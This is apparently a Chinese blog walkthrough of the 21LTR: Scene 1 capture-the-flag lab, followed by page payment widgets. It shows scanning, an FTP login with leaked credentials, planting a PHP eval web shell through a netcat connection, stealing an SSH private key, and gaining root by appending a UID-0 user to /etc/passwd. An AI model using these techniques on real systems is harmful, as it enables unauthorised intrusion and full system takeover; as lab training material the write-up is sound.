Hack the 21LTR: Scene 1 靶机

靶机配置

kali配置

虚拟网络适配器配置

不行的时候关闭虚拟机,多点几次生成

主机发现和端口扫描

主机发现

arp-scan -l

端口扫描

端口扫描发现21,22,80端口开放

nmap -sV -A -T4 192.168.2.120

访问80端口

http://192.168.2.120/

查看页面源码

发现账户密码

猜测是ftp的用户和密码

ftp连接

ftp 192.168.2.120

ls

下载并读取文件

get backup_log.php /home/kali/Desktop/1.php
cat 1.php

查看1.php文件

是个html文件,尝试将其源文件拼接在网页访问

http://192.168.2.120/logs/backup_log.php/

尝试在日志文件写入木马,参考了一下其他文档,需要利用10001端口

nc -nv 192.168.2.120 10001
<?php @eval($_REQUEST['cmd']);?>

蚁剑连接

查看敏感文件

/etc/passwd

双击进入

因为有ssh服务,就读取一下密钥

/media/USB_1/Stuff/Keys/id_rsa

下载id_rsa文件到本地再拖到kali

赋予id_rsa读写权限

chmod 600 id_rsa

ssh登录

ssh -i id_rsa hbeale@192.168.2.120

修改config文件

cd ~/.ssh
vim config

添加以下信息

Host *
    HostKeyAlgorithms +ssh-rsa

要是有这个报错的话(sign_and_send_pubkey: no mutual signature supported)

将以下内容写入config

cd ~/.ssh
vim config
echo "PubkeyAcceptedKeyTypes +ssh-rsa" >> config

ssh连接

ssh -i id_rsa hbeale@192.168.2.120

创建用户密码

openssl命令生成密码

openssl passwd 123456

创建用户,创建完成后Ctrl+c退出

sudo /usr/bin/cat >> /etc/passwd
aroot:$1$J1DRKiec$c6CXi9UUFTMKwHS6lk3bI1:0:0:/root:/bin/bash

切换用户,查看是否提权成功

su aroot
密码:123456
id
whoami

提权成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值